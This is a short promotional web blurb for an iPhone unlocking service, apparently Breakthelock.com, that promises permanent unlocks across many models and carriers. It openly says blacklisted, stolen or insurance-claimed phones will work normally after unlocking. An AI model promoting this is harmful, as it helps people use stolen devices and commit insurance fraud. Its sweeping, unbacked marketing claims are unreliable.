• you can even unlock black listed , stolen or insurance claimed phones . they will work normally like a factory unlocked phone after unlocking 

 What models are supported ?

 The big thing is you unlock almost all iPhone models from 40 countries and 500 different carriers around the world . Breakthelock.com supports all base bands and firmware versions .

unlike software unlocks or jailbreaks , This is a permanent solution you just need to unlock it once and you iphone will stay unlocked forever .You can update IOS, sync with iTunes ,change Sim cards when ever you like with of the fear of ever re locking again .Unlock IPhone now..

Read More